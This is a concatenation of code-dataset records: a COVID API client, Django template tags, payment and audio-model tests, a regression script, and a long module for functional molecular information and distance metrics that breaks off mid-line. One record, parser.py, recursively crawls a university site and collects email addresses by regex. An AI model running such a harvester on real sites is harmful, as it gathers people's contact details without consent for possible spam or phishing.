print(image_to_string('./test5.png'))\n\n\n\n","sub_path":"longling/framework/ocr/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"18256851","text":"\"\"\"\"Classes and models for handling COVID data from the `disease.sh` API.\"\"\"\nfrom datetime import datetime\nfrom typing import List, Literal, Mapping, Optional, Union\n\nfrom loguru import logger\nfrom pydantic import BaseModel\n\nfrom heatmaps.data import abc\n\n\nclass Statistic(BaseModel):\n \"\"\"\n Represents a statistic dictionary. (Refer `schema.md`)\n \"\"\"\n\n stat: str\n count: int\n\n\nclass Country(BaseModel):\n \"\"\"\n Represents a country's data in the format that it is stored in the database.\n \"\"\"\n\n country: str\n population: int\n statistics: List[Statistic]\n\n\nclass CovidDataDocument(BaseModel):\n api: str\n time: datetime\n data: List[Country]\n\n\nclass Covid(abc.AbstractAPIClient):\n API_URL = \"https://disease.sh/\"\n SAVED_STATS = {\"cases\", \"todayCases\", \"deaths\", \"todayDeaths\", \"recovered\", \"tests\"}\n\n async def fetch_data(self) -> Optional[list]: # the endpoint returns a list\n async with self.app.ctx.http_session.get(\n Covid.API_URL + \"v3/covid-19/countries\"\n ) as resp:\n if resp.status == 200:\n logger.trace(\" Fetched COVID data\")\n return await resp.json()\n else:\n logger.warning(\n f\" API returned non-200 status code ({resp.status}), could not fetch data\"\n )\n\n def parse_data(self, data: list) -> dict:\n final = {\"api\": \"covid\", \"time\": datetime.utcnow(), \"data\": []}\n\n for country in data:\n country_dict = {\n \"country\": country[\"country\"],\n \"population\": country[\"population\"],\n \"statistics\": [],\n }\n\n for stat in Covid.SAVED_STATS:\n country_dict[\"statistics\"].append(\n {\"stat\": stat, \"count\": country[stat]}\n )\n\n final[\"data\"].append(country_dict)\n\n # validation using pydantic (this eliminates the need to test this function)\n CovidDataDocument.parse_obj(final)\n\n logger.trace(\" Data parsed\")\n return final\n\n async def insert_data(self, data: dict) -> None:\n await self.collection.replace_one({\"api\": \"covid\"}, data, upsert=True)\n logger.info(\" Data inserted to database\")\n\n def normalize(self, value: int, total: int) -> float:\n # TODO: think this through, and write tests\n return (value / total) * 10\n\n async def collect_data(self) -> None:\n raw = await self.fetch_data()\n if raw is None:\n logger.error(\" Data could not be retrieved, stopping collection\")\n return\n parsed = self.parse_data(raw)\n await self.insert_data(parsed)\n logger.info(\" Data collection completed\")\n\n async def retrieve_data(self) -> Optional[CovidDataDocument]:\n \"\"\"\n Entrypoint function to retrieve stored data on-demand.\n\n Returns:\n CovidDataDocument: A Pydantic validated model\n \"\"\"\n data = await self.collection.find_one({\"api\": \"covid\"})\n\n if data is None:\n logger.warning(\" No pre-existing data in the database\")\n return\n\n return CovidDataDocument.parse_obj(data)\n\n\nStatisticType = Union[\n Literal[\"cases\"],\n Literal[\"todayCases\"],\n Literal[\"deaths\"],\n Literal[\"todayDeaths\"],\n Literal[\"recovered\"],\n Literal[\"tests\"],\n]\n\n\ndef filter_by_stat(data: CovidDataDocument, stat: StatisticType) -> List[Mapping]:\n \"\"\"\n Filters the entire COVID data stored in the database\n to leave just the relevant statistic.\n \"\"\"\n out = []\n\n for country in data.data:\n new_country = {\"country\": country.country, \"population\": country.population}\n\n for statistic_dict in country.statistics:\n if statistic_dict.stat == stat:\n new_country[\"statistics\"] = statistic_dict\n break\n\n out.append(new_country)\n\n return out\n","sub_path":"heatmaps/data/covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"545694482","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/wenlincms/generic/templatetags/rating_tags.py\n# Compiled at: 2016-05-20 23:42:06\nfrom __future__ import unicode_literals\nfrom wenlincms import template\nfrom wenlincms.generic.forms import RatingForm\nregister = template.Library()\n\n@register.inclusion_tag(b'generic/includes/rating.html', takes_context=True)\ndef rating_for(context, obj):\n \"\"\"\n Provides a generic context variable name for the object that\n ratings are being rendered for, and the rating form.\n \"\"\"\n context[b'rating_object'] = context[b'rating_obj'] = obj\n context[b'rating_form'] = RatingForm(context[b'request'], obj)\n ratings = context[b'request'].COOKIES.get(b'wenlincms-rating', b'')\n rating_string = b'%s.%s' % (obj._meta, obj.pk)\n context[b'rated'] = rating_string in ratings\n rating_name = obj.get_ratingfield_name()\n for f in ('average', 'count', 'sum'):\n context[b'rating_' + f] = getattr(obj, b'%s_%s' % (rating_name, f))\n\n return context","sub_path":"pycfiles/wenlincms-2.7.1-py2.7/rating_tags.py","file_name":"rating_tags.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"486983371","text":"from decimal import Decimal\n\nimport pytest\nfrom django.test import TestCase\n\nfrom api.booking.booking_model import Payment, PaymentMethod, SubmitErrorType\nfrom api.common.models import Money, Address\nfrom api.models.models import PaymentTransaction\nfrom api.payments import payment_service\nfrom api.view.exceptions import PaymentException\nfrom api.tests import test_objects\nfrom api.tests.integration import test_stripe\n\n\nclass TestPaymentService(TestCase):\n def test_authorize_payment_token(self):\n payment_token = test_stripe.create_test_token(\"4242424242424242\")\n\n amount = Money(Decimal(\"1.00\"), \"USD\")\n payment = Payment(\n payment_card_parameters=None,\n billing_address=Address(\n address1=\"123 Street Way\", city=\"San Francisco\", province=\"CA\", country=\"US\", postal_code=\"94111\"\n ),\n payment_token=payment_token,\n payment_method=PaymentMethod.PAYMENT_TOKEN,\n )\n\n payment_description = \"Test Payment\"\n\n result = payment_service.authorize_payment(amount, payment, payment_description)\n assert result.charge_id is not None\n\n retrieved_transaction = PaymentTransaction.objects.filter(charge_id=result.charge_id).first()\n assert retrieved_transaction.charge_id == result.charge_id\n assert retrieved_transaction.transaction_amount == Decimal(\"1.00\")\n\n def test_authorize_payment_card(self):\n payment = test_objects.payment(\"4000000000000077\")\n payment_description = \"Test Payment\"\n amount = Money(Decimal(\"1.05\"), \"USD\")\n\n result = payment_service.authorize_payment(amount, payment, payment_description)\n assert result.charge_id is not None\n assert result.payment_token is not None\n assert result.payment_token.startswith(\"tok_\")\n assert result.transaction_amount == Decimal(\"1.05\")\n\n def test_invalid_payment(self):\n payment = test_objects.payment(\"4000000000000002\") # Card fails\n payment_description = \"Failing Payment\"\n amount = Money(Decimal(\"1.10\"), \"USD\")\n\n with pytest.raises(PaymentException) as e:\n payment_service.authorize_payment(amount, payment, payment_description)\n\n assert e.value.error_type == SubmitErrorType.PAYMENT_DECLINED\n assert \"Your card was declined\" in e.value.detail\n","sub_path":"api/tests/integration/test_payment_service.py","file_name":"test_payment_service.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"455920056","text":"import pytorch_lightning as pl\nimport torch\n\nfrom pyannote.audio.models.segmentation.debug import SimpleSegmentationModel\nfrom pyannote.audio.tasks import SpeakerTracking, VoiceActivityDetection\nfrom pyannote.database import FileFinder, get_protocol\n\n\ndef setup_tasks(task):\n protocol = get_protocol(\n \"Debug.SpeakerDiarization.Debug\", preprocessors={\"audio\": FileFinder()}\n )\n vad = task(protocol, duration=0.2, batch_size=32, num_workers=4)\n return protocol, vad\n\n\ndef create_dl(model, task):\n m = model(task=task)\n task.setup(\"fit\")\n m.setup(\"fit\")\n return task.train_dataloader()\n\n\ndef get_next5(dl):\n last5 = []\n it = iter(dl)\n for i in range(5):\n last5.append(next(it))\n return last5\n\n\ndef test_seeding_ensures_data_loaders():\n \"Setting a global seed for the dataloaders ensures that we get data back in the same order\"\n pl.seed_everything(1)\n\n for task in [VoiceActivityDetection, SpeakerTracking]:\n protocol, vad = setup_tasks(task)\n dl = create_dl(SimpleSegmentationModel, vad)\n last5a = get_next5(dl)\n\n protocol, vad = setup_tasks(task)\n dl = create_dl(SimpleSegmentationModel, vad)\n last5b = get_next5(dl)\n\n for i in range(len(last5b)):\n assert torch.equal(last5a[i][\"X\"], last5b[i][\"X\"])\n\n\ndef test_different_seeds():\n \"Changing the global seed will change the order of the data that loads\"\n\n for task in [VoiceActivityDetection, SpeakerTracking]:\n protocol, vad = setup_tasks(task)\n pl.seed_everything(4)\n dl = create_dl(SimpleSegmentationModel, vad)\n last5a = get_next5(dl)\n\n protocol, vad = setup_tasks(task)\n pl.seed_everything(5)\n dl = create_dl(SimpleSegmentationModel, vad)\n last5b = get_next5(dl)\n\n for i in range(5):\n assert not torch.equal(last5a[i][\"X\"], last5b[i][\"X\"])\n","sub_path":"tests/tasks/test_reproducibility.py","file_name":"test_reproducibility.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"184135667","text":"import re\nimport requests\n\nsiteUrl = 'http://www.csd.tsu.ru'\n\nn = 3\nuniqEmails = set()\nuniqUrls = set()\n\ndef emailSearch(url, depth):\n\tif depth <= n:\n\t\ttry:\n\t\t\trequest = requests.get(url)\n\t\texcept:\n\t\t\treturn\n\t\tcurrEmails=re.findall(r'[a-z][\\w]*[@][a-z][\\w]*[\\.][a-z][\\w|.]*', request.text)\n\t\tfor em in currEmails:\n\t\t\tuniqEmails.add(em)\n\n\t\tabsUrl=re.findall(r'href=\"(http?:\\/\\/[\\w\\/\\.]*)\"', request.text)\n\t\trelUrl=re.findall(r'href=[\\\"\\'](.*?)[\\\"\\']', request.text)\n\t\tfor url in absUrl:\n\t\t\tif url not in uniqUrls:\n\t\t\t\tuniqUrls.add(url)\n\t\t\t\temailSearch(url, depth + 1)\n\n\t\tfor url in relUrl:\n\t\t\tif url not in uniqUrls:\n\t\t\t\tuniqUrls.add(url)\n\t\t\t\temailSearch(url, depth + 1)\n\n\n\nemailSearch(siteUrl, 1)\nprint('result: ')\nprint(uniqEmails)\n","sub_path":"python/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"450614468","text":"import numpy as np\nimport time\n\n# 分训练集和测试集 进行训练\ndata = np.loadtxt(\"cars-train.csv\",delimiter=\",\")\nm1 = 1\nm2 = 1\nb = 1\nweight = np.array([\n [m1],\n [m2],\n [b],\n])\nfeature = data[:,0:2] # 保留了维度信息的feature\nfeatureMatrix = np.append(feature, np.ones(shape=(len(feature), 1)),axis=1)\nlabel = np.expand_dims(data[:, -1], axis=1) # 保留了维度信息的label\nlearningRate = 0.00001\n\n#梯度下降的函数\ndef grandentdecent():\n result = np.dot(featureMatrix.T,np.dot(featureMatrix,weight) - label)/len(featureMatrix)*2\n return result #结果矩阵 第0行第0列是对m的偏导,第0行第1列是对b的偏导\n#训练\ndef train():\n startTime = time.time()\n for i in range(1,10000000):\n result = grandentdecent()\n # print(result)\n global weight\n weight = weight - result*learningRate\n if (abs(result[0][0])<0.5 and abs(result[1][0])<0.5 and abs(result[2][0])<0.5):\n break\n endTime = time.time()\n print(\"weight={}\".format(weight))\n print(\"消耗的时间={}\".format(endTime-startTime))\n\n\nif __name__ == '__main__':\n train()\n\n# weight=[[-0.1025721 ]\n# [-4.27357477]\n# [40.29786641]]\n# 消耗的时间=27.391464710235596\n","sub_path":"matrix/linearRegression4.py","file_name":"linearRegression4.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"49479922","text":"# -*- coding: utf-8 -*-\n\"\"\"This module contains classes for calculating functional molecular information statistics.\n\n\"\"\"\nfrom collections import Counter, defaultdict\nfrom multiprocessing import Pool\nfrom operator import itemgetter\nfrom string import Template\nfrom ast import literal_eval as make_tuple\nimport bisect\nimport copy\nimport pkgutil\nimport itertools\nimport sys\nimport numpy as np\nfrom pandas.io.formats.format import return_docstring\n\nimport nsb_entropy as nb\n# import tsfm.nsb_entropy as nb\nimport random\nimport time\nimport math as mt\nimport exact as exact\n# import tsfm.exact as exact\nimport glob\nimport re\nimport statsmodels.stats.multitest as smm\nimport pandas as pd\n\n\nclass DistanceCalculator:\n \"\"\"A `DistanceCalculator` object contains methods for calculating several pairwise distance metrics between function logos.\n \n Currently, a `DistanceCalculator` object can calculate pairwise distance using the square-root of the Jensen-Shannon\n divergence and will print the resulting distance matrix to stdout.\n\n Args:\n distance (str): Indicates which distance metric to use for pairwise calculations.\n\n Attributes:\n distanceMetric (str): Indicates the distance metric to be used in \n pairwise calculations.\n featureSet (:obj:`set` of :obj:`str`): A :obj:`set` of the structural \n features contained in the function logos being compared (e.g. 1A, 173AU).\n functionSet (:obj:`set` of :obj:`str`): A :obj:`set` of the functional \n classes contained in the function logos being compared.\n\n Example::\n \n x = tsfm.MolecularInformation.DistanceCalculator('jsd')\n x.get_distance(function_logos)\n\n \"\"\"\n\n def __init__(self, distance):\n \"\"\"The initialization of a `DistanceCalculator` object requires a :str: indicating the distance metric to be used.\n\n \"\"\"\n self.distanceMetric = distance\n self.featureSet = set()\n self.functionSet = set()\n\n def get_distance(self, ResultsDict):\n \"\"\"\n Prints a pairwise distance matrix using the distance metric indicated during instantiation to file. \n\n Args:\n ResultsDict (:obj:`dict` of :obj:`str` mapping to :class:`FunctionLogoResults`):\n The values of the :obj:`dict` are compared using the selected pairwise\n distance metric.\n \n \n Note:\n Creates a :obj:`dict` of :obj:`str`: :class:`pandas.DataFrame` from \n :obj:`ResultsDict`. The index of the dataframes are the union \n of the structural features contained in :obj:`ResultsDict`, \n and columns labels are the union of the functional classes contained in \n :obj:`ResultsDict` including a column containing \n the functional information of the feature measured in bits. \n Rows contain the Gorodkin fractional heights of each functional \n class of each feature along with the functional information of the \n feature measured in bits. The fractional heights of \n each row is normalized to account for filtering of data and rounding \n errors. The :obj:`dict` of :obj:`str`: :obj:`pandas.DataFrame` is \n passed to the distance method set when the :class:`DistanceCalculator` \n was instantiated. Below is an example of the :class:`pandas.DataFrame` \n created\\:\n \n +--------+-------+-------+-------+-------+-------+-------+--------+\n | | A | C | D | E | F | E | bits |\n +========+=======+=======+=======+=======+=======+=======+========+\n | 1A | 0.500 | 0.250 | 0.125 | 0.000 | 0.000 | 0.125 | 2.453 |\n +--------+-------+-------+-------+-------+-------+-------+--------+\n | 1U | 0.000 | 0.250 | 0.125 | 0.500 | 0.125 | 0.000 | 2.453 |\n +--------+-------+-------+-------+-------+-------+-------+--------+\n\n \"\"\"\n for result in ResultsDict:\n for coord in ResultsDict[result].basepairs:\n if (coord in ResultsDict[result].info):\n for pairtype in ResultsDict[result].info[coord]:\n self.featureSet.add(\"{}{}\".format(\"\".join(str(i) for i in coord), pairtype))\n for function in ResultsDict[result].height[coord][pairtype]:\n self.functionSet.add(function)\n\n for coord in range(ResultsDict[result].pos):\n if (coord in ResultsDict[result].info):\n for base in ResultsDict[result].info[coord]:\n self.featureSet.add(\"{}{}\".format(coord, base))\n for function in ResultsDict[result].height[coord][base]:\n self.functionSet.add(function)\n\n # add inverse info features\n for coord in ResultsDict[result].basepairs:\n if (coord in ResultsDict[result].inverseInfo):\n for pairtype in ResultsDict[result].inverseInfo[coord]:\n self.featureSet.add(\"i{}{}\".format(\"\".join(str(i) for i in coord), pairtype))\n\n for coord in range(ResultsDict[result].pos):\n if (coord in ResultsDict[result].inverseInfo):\n for base in ResultsDict[result].inverseInfo[coord]:\n self.featureSet.add(\"i{}{}\".format(coord, base))\n\n # remove features that contain gaps\n self.featureSet = {feature for feature in self.featureSet if not \"-\" in feature}\n\n # prepare pandas dataframes for each result object\n functionDict = {}\n pandasDict = {}\n for function in self.functionSet:\n functionDict[function] = np.zeros(len(self.featureSet), )\n functionDict[\"bits\"] = np.zeros(len(self.featureSet), )\n\n for result in ResultsDict:\n pandasDict[result] = pd.DataFrame(functionDict, index=self.featureSet)\n for coord in ResultsDict[result].basepairs:\n if (coord in ResultsDict[result].info):\n for pairtype in [pair for pair in ResultsDict[result].info[coord] if not \"-\" in pair]:\n row = \"{}{}\".format(\"\".join(str(i) for i in coord), pairtype)\n pandasDict[result].loc[row, \"bits\"] = ResultsDict[result].info[coord][pairtype]\n for function in ResultsDict[result].height[coord][pairtype]:\n pandasDict[result].loc[row, function] = ResultsDict[result].height[coord][pairtype][\n function]\n\n for coord in range(ResultsDict[result].pos):\n if (coord in ResultsDict[result].info):\n for base in [nuc for nuc in ResultsDict[result].info[coord] if not nuc == \"-\"]:\n row = \"{}{}\".format(coord, base)\n pandasDict[result].loc[row, \"bits\"] = ResultsDict[result].info[coord][base]\n for function in ResultsDict[result].height[coord][base]:\n pandasDict[result].loc[row, function] = ResultsDict[result].height[coord][base][function]\n\n for coord in ResultsDict[result].basepairs:\n if (coord in ResultsDict[result].inverseInfo):\n for pairtype in [pair for pair in ResultsDict[result].inverseInfo[coord] if not \"-\" in pair]:\n row = \"i{}{}\".format(\"\".join(str(i) for i in coord), pairtype)\n pandasDict[result].loc[row, \"bits\"] = ResultsDict[result].inverseInfo[coord][pairtype]\n for function in ResultsDict[result].inverseHeight[coord][pairtype]:\n pandasDict[result].loc[row, function] = ResultsDict[result].inverseHeight[coord][pairtype][\n function]\n\n for coord in range(ResultsDict[result].pos):\n if (coord in ResultsDict[result].inverseInfo):\n for base in [nuc for nuc in ResultsDict[result].inverseInfo[coord] if not nuc == \"-\"]:\n row = \"i{}{}\".format(coord, base)\n pandasDict[result].loc[row, \"bits\"] = ResultsDict[result].inverseInfo[coord][base]\n for function in ResultsDict[result].inverseHeight[coord][base]:\n pandasDict[result].loc[row, function] = ResultsDict[result].inverseHeight[coord][base][\n function]\n\n # normalize heights to equal one after possible removal of CIFs based on some criteria\n for frame in pandasDict:\n pandasDict[frame] = pandasDict[frame].round(3)\n pandasDict[frame].drop('bits', axis=1).div(pandasDict[frame].drop('bits', axis=1).sum(axis=1), axis=0)\n\n if (self.distanceMetric == \"jsd\"):\n self.rJSD(pandasDict)\n\n def rJSD(self, pandasDict):\n \"\"\"\n Produces pairwise comparisons using rJSD metric\n\n This is method should not be directly called. Instead use the\n :meth:`get_distance`. All pairwise comparsions of OTUs are produced\n and :meth:`rJSD_distance` is called to do the calculations.\n\n Args:\n pandasDict (:obj:`dict` of `str` mapping to :class:`pandas.DataFrame`): \n See :meth:`get_distance` for the format of the Data Frames.\n \"\"\"\n pairwise_combinations = itertools.permutations(pandasDict.keys(), 2)\n jsdDistMatrix = pd.DataFrame(index=list(pandasDict.keys()), columns=list(pandasDict.keys()))\n jsdDistMatrix = jsdDistMatrix.fillna(0)\n for pair in pairwise_combinations:\n distance = 0\n for i, row in pandasDict[pair[0]].iterrows():\n if (row['bits'] == 0 and pandasDict[pair[1]].loc[i, 'bits'] == 0):\n continue\n else:\n distance += self.rJSD_distance(row.drop('bits').as_matrix(),\n pandasDict[pair[1]].loc[i,].drop('bits').as_matrix(),\n row['bits'], pandasDict[pair[1]].loc[i, 'bits'])\n\n jsdDistMatrix.loc[pair[0], pair[1]] = distance\n\n jsdDistMatrix = jsdDistMatrix.round(6)\n jsdDistMatrix.to_csv(\"jsdDistance.matrix\", sep=\"\\t\")\n\n def entropy(self, dist):\n return np.sum(-dist[dist != 0] * np.log2(dist[dist != 0]))\n\n def rJSD_distance(self, dist1, dist2, pi1, pi2):\n r\"\"\"\n Weighted square root of the generalized Jensen-Shannon divergence defined by Lin 1991\n\n .. math:: \n \n D(X,Y) \\equiv \\sum_{f \\in F} (I_f^X + I_f^Y) \\sqrt{H[\\pi_f^X p_f^X + \\pi_f^Y p_f^Y] - (\\pi_f^X H[p_f^X] + \\pi_f^Y H[p_f^Y])}\n\n where :math:`\\pi_f^X = \\frac{I_f^X}{I_f^X + I_f^Y}` and :math:`\\pi_f^Y = \\frac{I_f^Y}{I_f^X + I_f^Y}`\n\n \"\"\"\n step = self.entropy(pi1 * dist1 + pi2 * dist2) - (pi1 * self.entropy(dist1) + pi2 * self.entropy(dist2))\n return (pi1 + pi2) * mt.sqrt(step if step >= 0 else 0)\n\n\nclass FunctionLogoResults:\n \"\"\"\n Stores results from information calculations and provides methods for text output and visualization.\n\n Args:\n name (:obj:`str`): Value is used as prefix for output files.\n basepairs (:obj:`list` of :obj:`tuples` of (:obj:`int`, :obj:`int`)):\n a list of basepair coordinates encoded as a :obj:`tuple` of two \n :obj:`int`. \n \n Note:\n This data structure is created as an attribute of \n :class:`FunctionLogo` during instantiation and can be accessed\n with :attr:`FunctionLogo.basepairs` or created during\n instantiation of this class when ``from_file = True``\n pos (:obj:`int`): Stores length of the alignment.\n \n Note:\n See note for :attr:`basepairs`. Accessed using :attr:`FunctionLogo.pos`.\n sequences (:obj:`list` of :class:`Seq`): a list of :class:`Seq` objects \n used for text output and visualization.\n\n Note:\n See note for :attr:`basepairs`. Accessed using :attr:`FunctionLogo.seq`\n pairs (:obj:`set` of :obj:`str`): unique basepair states found in the dataset.\n\n Note: \n See note for :attr:`basepairs`.\n singles (:obj:`set` of :obj:`str`): unique states for single sites.\n \n Note:\n See note for :attr:`basepairs`.\n \n info (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features to information content. Add this data structure using :meth:`add_information`.\n\n Note:\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_MM()`.\n height (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features and functional class to class height. Add this data structure using :meth:`add_information`.\n\n Note:\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_MM()`.\n inverseInfo (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features to information content for anti-determinants. Add this data structure using :meth:`add_information`.\n\n Note:\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_inverse_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_inverse_MM()`.\n inverseHeight (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features and functional class to class height for anti-determinants. Add this data structure using :meth:`add_information`.\n\n Note:\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_inverse_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_inverse_MM()`.\n p (:obj:`dict` of :obj:`str` mapping to :obj:`dict`): mapping of structural features and class height to p-values.\n \n Note:\n This data structure is created using :meth:`add_stats()`\n inverse_p (:obj:`dict` of :obj:`str` mapping to :obj:`dict`): mapping of structural features and class height to p-values for anti-determinants\n \n Note:\n This data structure is created using :meth:`add_stats()`\n from_file (:obj:`bool`): create :class:`FunctionLogoResults` \n object from file written with \n :meth:`FunctionLogResults.text_output`\n \n \"\"\"\n\n def __init__(self, name, basepairs=None, pos=0, sequences=None, pairs=None, singles=None, info=None,\n height=None, inverseInfo=None, inverseHeight=None, p=None,\n inverse_p=None, from_file=False):\n self.pos = pos\n self.correction = \"\"\n if (not info):\n self.info = defaultdict(lambda: defaultdict(float))\n self.height = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n else:\n self.info = info\n self.height = height\n\n if (not inverseInfo):\n self.inverseInfo = defaultdict(lambda: defaultdict(float))\n self.inverseHeight = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n else:\n self.inverseInfo = inverseInfo\n self.inverseHeight = inverseHeight\n\n if (not p):\n self.p = {'P': defaultdict(lambda: defaultdict(float)),\n 'p': defaultdict(lambda: defaultdict(lambda: defaultdict(float))),\n 'P_corrected': defaultdict(lambda: defaultdict(float)),\n 'p_corrected': defaultdict(lambda: defaultdict(lambda: defaultdict(float)))}\n else:\n self.p = p\n\n if (not inverse_p):\n self.inverse_p = {'P': defaultdict(lambda: defaultdict(float)),\n 'p': defaultdict(lambda: defaultdict(lambda: defaultdict(float))),\n 'P_corrected': defaultdict(lambda: defaultdict(float)),\n 'p_corrected': defaultdict(lambda: defaultdict(lambda: defaultdict(float)))}\n else:\n self.inverse_p = inverse_p\n\n if (not basepairs):\n self.basepairs = []\n else:\n self.basepairs = basepairs\n if (not sequences):\n self.sequences = []\n else:\n self.sequences = sequences\n\n if (not pairs):\n self.pairs = set()\n else:\n self.pairs = pairs\n\n if (not singles):\n self.singles = set()\n else:\n self.singles = singles\n\n if (from_file):\n self.name = name.split(\"/\")[-1]\n self.from_file(name)\n else:\n self.name = name\n\n def from_file(self, file_name):\n \"\"\"\n Read previously calculated results from file.\n\n Populates :class:`FunctionLogoResults` from previously calculated \n results written to a file using :meth:`text_output`. \n\n Args:\n file_name(:obj:`str`): File path of previously caclulated results\n \"\"\"\n pvalue = False\n file_handle = open(file_name, \"r\")\n for line in file_handle:\n if (line.startswith(\"#\")):\n if (\"p-value\" in line):\n pvalue = True\n else:\n line = line.strip()\n spline = line.split(\"\\t\")\n if (spline[0] == \"bp:\"):\n if (not make_tuple(spline[1]) in self.basepairs):\n self.basepairs.append(make_tuple(spline[1]))\n self.pairs.add(spline[2])\n self.info[make_tuple(spline[1])][spline[2]] = float(spline[4])\n if (pvalue):\n self.p['P'][make_tuple(spline[1])][spline[2]] = float(spline[5])\n self.p['P_corrected'][make_tuple(spline[1])][spline[2]] = float(spline[6])\n for function in spline[7].split():\n function_split = function.split(\":\")\n self.height[make_tuple(spline[1])][spline[2]][function_split[0]] = float(function_split[1])\n if (pvalue):\n self.p['p'][make_tuple(spline[1])][spline[2]][function_split[0]] = float(function_split[2])\n self.p['p_corrected'][make_tuple(spline[1])][spline[2]][function_split[0]] = float(\n function_split[3])\n elif (spline[0] == \"ss:\"):\n if (self.pos < int(spline[1])):\n self.pos = int(spline[1])\n self.singles.add(spline[2])\n self.info[int(spline[1])][spline[2]] = float(spline[4])\n if (pvalue):\n self.p['P'][int(spline[1])][spline[2]] = float(spline[5])\n self.p['P_corrected'][int(spline[1])][spline[2]] = float(spline[6])\n for function in spline[7].split():\n function_split = function.split(\":\")\n self.height[int(spline[1])][spline[2]][function_split[0]] = float(function_split[1])\n if (pvalue):\n self.p['p'][int(spline[1])][spline[2]][function_split[0]] = float(function_split[2])\n self.p['p_corrected'][int(spline[1])][spline[2]][function_split[0]] = float(\n function_split[3])\n elif (spline[0] == \"ibp:\"):\n if (not make_tuple(spline[1]) in self.basepairs):\n self.basepairs.append(make_tuple(spline[1]))\n self.pairs.add(spline[2])\n self.inverseInfo[make_tuple(spline[1])][spline[2]] = float(spline[4])\n if (pvalue):\n self.inverse_p['P'][make_tuple(spline[1])][spline[2]] = float(spline[5])\n self.inverse_p['P_corrected'][make_tuple(spline[1])][spline[2]] = float(spline[6])\n for function in spline[7].split():\n function_split = function.split(\":\")\n self.inverseHeight[make_tuple(spline[1])][spline[2]][function_split[0]] = float(\n function_split[1])\n if (pvalue):\n self.inverse_p['p'][make_tuple(spline[1])][spline[2]][function_split[0]] = float(\n function_split[2])\n self.inverse_p['p_corrected'][make_tuple(spline[1])][spline[2]][function_split[0]] = float(\n function_split[3])\n elif (spline[0] == \"iss:\"):\n if (self.pos < int(spline[1])):\n self.pos = int(spline[1])\n self.singles.add(spline[2])\n self.inverseInfo[int(spline[1])][spline[2]] = float(spline[4])\n if (pvalue):\n self.inverse_p['P'][int(spline[1])][spline[2]] = float(spline[5])\n self.inverse_p['P_corrected'][int(spline[1])][spline[2]] = float(spline[6])\n for function in spline[7].split():\n function_split = function.split(\":\")\n self.inverseHeight[int(spline[1])][spline[2]][function_split[0]] = float(function_split[1])\n if (pvalue):\n self.inverse_p['p'][int(spline[1])][spline[2]][function_split[0]] = float(function_split[2])\n self.inverse_p['p_corrected'][int(spline[1])][spline[2]][function_split[0]] = float(\n function_split[3])\n self.pos += 1 # fix off by one\n file_handle.close()\n\n def add_information(self, info, height, inverse=False):\n \"\"\"\n Add data structures containing results from information calculations\n\n This method is used to add results from \n :meth:`FunctionLogo.calculate_entropy_NSB()`, \n :meth:`FunctionLogo.calculate_entropy_MM()`,\n :meth:`FunctionLogo.calculate_entropy_inverse_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_inverse_MM()`. If reading previous\n results from a file this method is unnecessary because these data structures\n are populated from values in the file.\n\n Args:\n info (:obj:`dict`): mapping of structural features to information \n content. This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_MM()`.\n height (:obj:`dict`): mapping of structural features and functional class to class height.\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_MM()`.\n inverse (:obj:`bool`): Defines if the data structures are for\n anti-determinates.\n \"\"\"\n if (inverse):\n self.inverseInfo = info\n self.inverseHeight = height\n else:\n self.info = info\n self.height = height\n\n def add_stats(self, distribution, correction, inverse=False):\n \"\"\"\n Perform statisical testing and multiple test correction\n\n Calculates p-values and multiple testing corrected p-values for\n structural features and functional class heights. Requires an\n instance of :class:`FunctionLogoDist` and calls the \n :meth:`FunctionLogoDist.stat_test`. Methods for multiple test\n correction are provided by :class:`statsmodels.stats.multitest`.\n\n Args:\n distribution (:class:`FunctionLogoDist`): discrete probability \n distributions of information content of structural \n features and functional class height.\n correction (:obj:`str`): Multiple test correction method.\n inverse (:obj:`bool`): Produce statistical tests for\n anti-determinates.\n \"\"\"\n self.correction = correction\n if (inverse):\n self.inverse_p = 